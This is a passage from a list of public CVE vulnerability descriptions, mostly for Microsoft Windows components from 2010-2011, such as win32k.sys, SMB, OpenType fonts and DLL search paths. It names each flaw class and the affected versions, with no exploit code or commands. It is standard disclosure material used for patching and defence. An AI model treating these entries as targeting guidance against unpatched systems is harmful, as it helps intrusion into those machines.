"Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1228] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1227] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1226] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1225] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1068] Microsoft Windows Azure Software Development Kit (SDK) 1.3.x before 1.3.20121.1237, when Full IIS and a Web Role are used with an ASP.NET application, does not properly support the use of cookies for maintaining state, which allows remote attackers to obtain potentially sensitive information by reading an encrypted cookie and performing unspecified other steps. [CVE-2011-0677] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0676] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0675] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0674] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0673] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0672] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0671] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0670] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0667] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0666] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0665] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0662] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0661] The SMB Server service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate fields in SMB requests, which allows remote attackers to execute arbitrary code via a malformed request in a (1) SMBv1 or (2) SMBv2 packet, aka "SMB Transaction Parsing Vulnerability." [CVE-2011-0660] The SMB client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote SMB servers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Response Parsing Vulnerability." [CVE-2011-0658] Integer underflow in the OLE Automation protocol implementation in VBScript.dll in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted WMF file, aka "OLE Automation Underflow Vulnerability." [CVE-2011-0657] DNSAPI.dll in the DNS client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process DNS queries, which allows remote attackers to execute arbitrary code via (1) a crafted LLMNR broadcast query or (2) a crafted application, aka "DNS Query Vulnerability." [CVE-2011-0654] Integer underflow in the BowserWriteErrorLogEntry function in the Common Internet File System (CIFS) browser service in Mrxsmb.sys or bowser.sys in Active Directory in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via a malformed BROWSER ELECTION message, leading to a heap-based buffer overflow, aka "Browser Pool Corruption Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2011-0638] Microsoft Windows does not properly warn the user before enabling additional Human Interface Device (HID) functionality over USB, which allows user-assisted attackers to execute arbitrary programs via crafted USB data, as demonstrated by keyboard and mouse data sent by malware on a smartphone that the user connected to the computer. [CVE-2011-0627] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content, as possibly exploited in the wild in May 2011 by a Microsoft Office document with an embedded .swf file. [CVE-2011-0347] Microsoft Internet Explorer on Windows XP allows remote attackers to trigger an incorrect GUI display and have unspecified other impact via vectors related to the DOM implementation, as demonstrated by cross_fuzz. [CVE-2011-0096] The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle a MIME format in a request for content blocks in a document, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted web site that is visited in Internet Explorer, aka "MHTML Mime-Formatted Request Vulnerability." [CVE-2011-0091] Kerberos in Microsoft Windows Server 2008 R2 and Windows 7 does not prevent a session from changing from strong encryption to DES encryption, which allows man-in-the-middle attackers to spoof network traffic and obtain sensitive information via a DES downgrade, aka "Kerberos Spoofing Vulnerability." [CVE-2011-0090] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Corruption Vulnerability." [CVE-2011-0089] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Window Class Improper Pointer Validation Vulnerability." [CVE-2011-0088] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Window Class Pointer Confusion Vulnerability." [CVE-2011-0087] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Insufficient User Input Validation Vulnerability." [CVE-2011-0086] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Improper User Input Validation Vulnerability." [CVE-2011-0045] The Trace Events functionality in the kernel in Microsoft Windows XP SP3 does not properly perform type conversion, which causes integer truncation and insufficient memory allocation and triggers a buffer overflow, which allows local users to gain privileges via a crafted application, related to WmiTraceMessageVa, aka "Windows Kernel Integer Truncation Vulnerability." [CVE-2011-0043] Kerberos in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 supports weak hashing algorithms, which allows local users to gain privileges by operating a service that sends crafted service tickets, as demonstrated by the CRC32 algorithm, aka "Kerberos Unkeyed Checksum Vulnerability." [CVE-2011-0042] SBE.dll in the Stream Buffer Engine in Windows Media Player and Windows Media Center in Microsoft Windows XP SP2 and SP3, Windows XP Media Center Edition 2005 SP3, Windows Vista SP1 and SP2, Windows 7 Gold and SP1, and Windows Media Center TV Pack for Windows Vista does not properly parse Digital Video Recording (.dvr-ms) files, which allows remote attackers to execute arbitrary code via a crafted file, aka "DVR-MS Vulnerability." [CVE-2011-0041] Integer overflow in gdiplus.dll in GDI+ in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold and SP2, and Office XP SP3 allows remote attackers to execute arbitrary code via a crafted EMF image, aka "GDI+ Integer Overflow Vulnerability." [CVE-2011-0040] The server in Microsoft Active Directory on Windows Server 2003 SP2 does not properly handle an update request for a service principal name (SPN), which allows remote attackers to cause a denial of service (authentication downgrade or outage) via a crafted request that triggers name collisions, aka "Active Directory SPN Validation Vulnerability." [CVE-2011-0039] The Local Security Authority Subsystem Service (LSASS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly process authentication requests, which allows local users to gain privileges via a request with a crafted length, aka "LSASS Length Validation Vulnerability." [CVE-2011-0037] Microsoft Malware Protection Engine before 1.1.6603.0, as used in Microsoft Malicious Software Removal Tool (MSRT), Windows Defender, Security Essentials, Forefront Client Security, Forefront Endpoint Protection 2010, and Windows Live OneCare, allows local users to gain privileges via a crafted value of an unspecified user registry key. [CVE-2011-0034] Stack-based buffer overflow in the OpenType Compact Font Format (aka OTF or CFF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via crafted parameter values in an OpenType font, aka "OpenType Font Stack Overflow Vulnerability." [CVE-2011-0033] The OpenType Compact Font Format (CFF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate parameter values in OpenType fonts, which allows remote attackers to execute arbitrary code via a crafted font, aka "OpenType Font Encoded Character Vulnerability." [CVE-2011-0032] Untrusted search path vulnerability in DirectShow in Microsoft Windows Vista SP1 and SP2, Windows 7 Gold and SP1, Windows Server 2008 R2 and R2 SP1, and Windows Media Center TV Pack for Windows Vista allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Digital Video Recording (.dvr-ms), Windows Recorded TV Show (.wtv), or .mpg file, aka "DirectShow Insecure Library Loading Vulnerability." [CVE-2011-0031] The (1) JScript 5.8 and (2) VBScript 5.8 scripting engines in Microsoft Windows Server 2008 R2 and Windows 7 do not properly load decoded scripts obtained from web pages, which allows remote attackers to trigger memory corruption and consequently obtain sensitive information via a crafted web site, aka "Scripting Engines Information Disclosure Vulnerability." [CVE-2011-0030] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly kill processes after a logout, which allows local users to obtain sensitive information or gain privileges via a crafted application that continues to execute throughout the logout of one user and the login session of the next user, aka "CSRSS Elevation of Privilege Vulnerability," a different vulnerability than CVE-2010-0023. [CVE-2011-0028] WordPad in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly parse fields in Word documents, which allows remote attackers to execute arbitrary code via a crafted .doc file, aka "WordPad Converter Parsing Vulnerability." [CVE-2011-0027] Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2, and Windows Data Access Components (WDAC) 6.0, does not properly validate memory allocation for internal data structures, which allows remote attackers to execute arbitrary code, possibly via a large CacheSize property that triggers an integer wrap and a buffer overflow, aka "ADO Record Memory Vulnerability." NOTE: this might be a duplicate of CVE-2010-1117 or CVE-2010-1118. [CVE-2011-0026] Integer signedness error in the SQLConnectW function in an ODBC API (odbc32.dll) in Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2, and Windows Data Access Components (WDAC) 6.0, allows remote attackers to execute arbitrary code via a long string in the Data Source Name (DSN) and a crafted szDSN argument, which bypasses a signed comparison and leads to a buffer overflow, aka "DSN Overflow Vulnerability." [CVE-2010-5082] Untrusted search path vulnerability in colorcpl.exe 6.0.6000.16386 in the Color Control Panel in Microsoft Windows Server 2008 SP2, R2, and R2 SP1 allows local users to gain privileges via a Trojan horse sti.dll file in the current working directory, as demonstrated by a directory that contains a .camp, .cdmp, .gmmp, .icc, or .icm file, aka "Color Control Panel Insecure Library Loading Vulnerability." [CVE-2010-4701] Heap-based buffer overflow in the CDrawPoly::Serialize function in fxscover.exe in Microsoft Windows Fax Services Cover Page Editor 5.2 r2 in Windows XP Professional SP3, Server 2003 R2 Enterprise Edition SP2, and Windows 7 Professional allows remote attackers to execute arbitrary code via a long record in a Fax Cover Page (.cov) file. NOTE: some of these details are obtained from third party information. [CVE-2010-4669] The Neighbor Discovery (ND) protocol implementation in the IPv6 stack in Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7 allows remote attackers to cause a denial of service (CPU consumption and system hang) by sending many Router Advertisement (RA) messages with different source addresses, as demonstrated by the flood_router6 program in the thc-ipv6 package. [CVE-2010-4562] Microsoft Windows 2008, 7, Vista, 2003, 2000, and XP, when using IPv6, allows remote attackers to determine whether a host is sniffing the network by sending an ICMPv6 Echo Request to a multicast address and determining whether an Echo Reply is sent, as demonstrated by thcping. NOTE: due to a typo, some sources map CVE-2010-4562 to a ProFTPd mod_sql vulnerability, but that issue is covered by CVE-2010-4652. [CVE-2010-4398] Stack-based buffer overflow in the RtlQueryRegistryValues function in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges, and bypass the User Account Control (UAC) feature, via a crafted REG_BINARY value for a SystemDefaultEUDCFont registry key, aka "Driver Improper Interaction with Windows Kernel Vulnerability." [CVE-2010-4182] Untrusted search path vulnerability in the Data Access Objects (DAO) library (dao360.dll) in Microsoft Windows XP Professional SP3, Windows Server 2003 R2 Enterprise Edition SP3, Windows Vista Business SP1, and Windows 7 Professional allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse msjet49.dll that is located in the same folder as a file that is processed by dao360.dll. NOTE: the provenance of this information is unknown [CVE-2010-3974] fxscover.exe in the Fax Cover Page Editor in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly parse FAX cover pages, which allows remote attackers to execute arbitrary code via a crafted .cov file, aka "Fax Cover Page Editor Memory Corruption Vulnerability." [CVE-2010-3973] The WMITools ActiveX control in WBEMSingleView.ocx 1.50.1131.0 in Microsoft WMI Administrative Tools 1.1 and earlier in Microsoft Windows XP SP2 and SP3 allows remote attackers to execute arbitrary code via a crafted argument to the AddContextRef method, possibly an untrusted pointer dereference, aka "Microsoft WMITools ActiveX Control Vulnerability." [CVE-2010-3970] Stack-based buffer overflow in the CreateSizedDIBSECTION function in shimgvw.dll in the Windows Shell graphics processor (aka graphics rendering engine) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted .MIC or unspecified Office document containing a thumbnail bitmap with a negative biClrUsed value, as reported by Moti and Xu Hao, aka "Windows Shell Graphics Processing Overrun Vulnerability." [CVE-2010-3967] Untrusted search path vulnerability in Microsoft Windows Movie Maker (WMM) 2.6 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Movie Maker (MSWMM) file, aka "Insecure Library Loading Vulnerability." [CVE-2010-3966] Untrusted search path vulnerability in Microsoft Windows Server 2008 R2 and Windows 7, when BranchCache is supported, allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an EML file, an RSS file, or a WPOST file, aka "BranchCache Insecure Library Loading Vulnerability." [CVE-2010-3965] Untrusted search path vulnerability in Windows Media Encoder 9 on Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Windows Media Profile (PRX) file, aka "Insecure Library Loading Vulnerability." [CVE-2010-3963] Buffer overflow in the Routing and Remote Access NDProxy component in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, related to the Routing and Remote Access service (RRAS) and improper copying from user mode to the kernel, aka "Kernel NDProxy Buffer Overflow Vulnerability." [CVE-2010-3961] The Consent User Interface (UI) in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly handle an unspecified registry-key value, which allows local users with SeImpersonatePrivilege rights to gain privileges via a crafted application, aka "Consent UI Impersonation Vulnerability." [CVE-2010-3960] Hyper-V in Microsoft Windows Server 2008 Gold, SP2, and R2 allows guest OS users to cause a denial of service (host OS hang) by sending a crafted encapsulated packet over the VMBus, aka "Hyper-V VMBus Vulnerability." [CVE-2010-3959] The OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted CMAP table in an OpenType font, aka "OpenType CMAP Table Vulnerability." [CVE-2010-3957] Double free vulnerability in the OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted OpenType font, aka "OpenType Font Double Free Vulnerability." [CVE-2010-3956] The OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly perform array indexing, which allows local users to gain privileges via a crafted OpenType font, aka "OpenType Font Index Vulnerability." [CVE-2010-3944] win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Corruption Vulnerability." [CVE-2010-3943] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly link driver objects, which allows local users to gain privileges via a crafted application that triggers linked-list corruption, aka "Win32k Cursor Linking Vulnerability." [CVE-2010-3942] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly allocate memory for copies from user mode, which allows local users to gain privileges via a crafted application, aka "Win32k WriteAV Vulnerability." [CVE-2010-3941] Double free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold and SP2, and Windows 7 allows local users to gain privileges via a crafted application, aka "Win32k Double Free Vulnerability." [CVE-2010-3940] Double free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted application, aka "Win32k PFE Pointer Double Free Vulnerability." [CVE-2010-3939] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via vectors related to improper memory allocation for copies from user mode, aka "Win32k Buffer Overflow Vulnerability." [CVE-2010-3937] Microsoft Exchange Server 2007 SP2 on the x64 platform allows remote authenticated users to cause a denial of service (infinite loop and MSExchangeIS outage) via a crafted RPC request, aka "Exchange Server Infinite Loop Vulnerability." [CVE-2010-3889] Unspecified vulnerability in Microsoft Windows on 32-bit platforms allows local users to gain privileges via unknown vectors, as exploited in the wild in July 2010 by the Stuxnet worm, and identified by Microsoft researchers and other researchers. [CVE-2010-3888] Unspecified vulnerability in Microsoft Windows on 32-bit platforms allows local users to gain privileges via unknown vectors, as exploited in the wild in July 2010 by the Stuxnet worm, and identified by Kaspersky Lab researchers and other researchers. [CVE-2010-3338] The Windows Task Scheduler in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine the security context of scheduled tasks, which allows local users to gain privileges via a crafted application, aka "Task Scheduler Vulnerability." NOTE: this might overlap CVE-2010-3888. [CVE-2010-3324] The toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, Office SharePoint Server 2007 SP2, Groove Server 2010, and Office Web Apps, allows remote attackers to bypass the cross-site scripting (XSS) protection mechanism and conduct XSS attacks via a crafted use of the Cascading Style Sheets (CSS) @import rule, aka "HTML Sanitization Vulnerability," a different vulnerability than CVE-2010-1257. [CVE-2010-3243] Cross-site scripting (XSS) vulnerability in the toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2 and Office SharePoint Server 2007 SP2, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "HTML Sanitization Vulnerability." [CVE-2010-3229] The Secure Channel (aka SChannel) security package in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when IIS 7.x is used, does not properly process client certificates during SSL and TLS handshakes, which allows remote attackers to cause a denial of service (LSASS outage and reboot) via a crafted packet, aka "TLSv1 Denial of Service Vulnerability." [CVE-2010-3227] Stack-based buffer overflow in the UpdateFrameTitleForDocument method in the CFrameWnd class in mfc42.dll in the Microsoft Foundation Class (MFC) Library in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows context-dependent attackers to execute arbitrary code via a long window title that this library attempts to create at the request of an application, as demonstrated by the Trident PowerZip 7.2 Build 4010 application, aka "Windows MFC Document Title Updating Buffer Overflow Vulnerability." [CVE-2010-3225] Use-after-free vulnerability in the Media Player Network Sharing Service in Microsoft Windows Vista SP1 and SP2 and Windows 7 allows remote attackers to execute arbitrary code via a crafted Real Time Streaming Protocol (RTSP) packet, aka "RTSP Use After Free Vulnerability." [CVE-2010-3223] The user interface in Microsoft Cluster Service (MSCS) in Microsoft Windows Server 2008 R2 does not properly set administrative-share permissions for new cluster disks that are shared as part of a failover cluster, which allows remote attackers to read or modify data on these disks via requests to the associated share, aka "Permissions on New Cluster Disks Vulnerability." [CVE-2010-3147] Untrusted search path vulnerability in wab.exe 6.00.2900.5512 in Windows Address Book in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a Trojan horse wab32res.dll file in the current working directory, as demonstrated by a directory that contains a Windows Address Book (WAB), VCF (aka vCard), or P7C file, aka "Insecure Library Loading Vulnerability." NOTE: the codebase for this product may overlap the codebase for the product referenced in CVE-2010-3143. [CVE-2010-3145] Untrusted search path vulnerability in the BitLocker Drive Encryption API, as used in sdclt.exe in Backup Manager in Microsoft Windows Vista SP1 and SP2, allows local users to gain privileges via a Trojan horse fveapi.dll file in the current working directory, as demonstrated by a directory that contains a Windows Backup Catalog (.wbcat) file, aka "Backup Manager Insecure Library Loading Vulnerability." [CVE-2010-3144] Untrusted search path vulnerability in the Internet Connection Signup Wizard in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a Trojan horse smmscrpt.dll file in the current working directory, as demonstrated by a directory that contains an ISP or INS file, aka "Internet Connection Signup Wizard Insecure Library Loading Vulnerability." [CVE-2010-3143] Untrusted search path vulnerability in Microsoft Windows Contacts allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse wab32res.dll that is located in the same folder as a .contact, .group, .p7c, .vcf, or .wab file. NOTE: the codebase for this product may overlap the codebase for the product referenced in CVE-2010-3147. [CVE-2010-3140] Untrusted search path vulnerability in Microsoft Windows Internet Communication Settings on Windows XP SP3 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse schannel.dll that is located in the same folder as an ISP file. [CVE-2010-3138] Untrusted search path vulnerability in the Indeo Codec in iac25_32.ax in Microsoft Windows XP SP3 allows local users to gain privileges via a Trojan horse iacenc.dll file in the current working directory, as demonstrated by access through BS.Player or Media Player Classic to a directory that contains a .avi, .mka, .ra, or .ram file, aka "Indeo Codec Insecure Library Loading Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2010-2746] Heap-based buffer overflow in Comctl32.dll (aka the common control library) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when a third-party SVG viewer is used, allows remote attackers to execute arbitrary code via a crafted HTML document that triggers unspecified messages from this viewer, aka "Comctl32 Heap Overflow Vulnerability." [CVE-2010-2745] Microsoft Windows Media Player (WMP) 9 through 12 does not properly deallocate objects during a browser reload action, which allows user-assisted remote attackers to execute arbitrary code via crafted media content referenced in an HTML document, aka "Windows Media Player Memory Corruption Vulnerability." [CVE-2010-2744] The kernel-mode 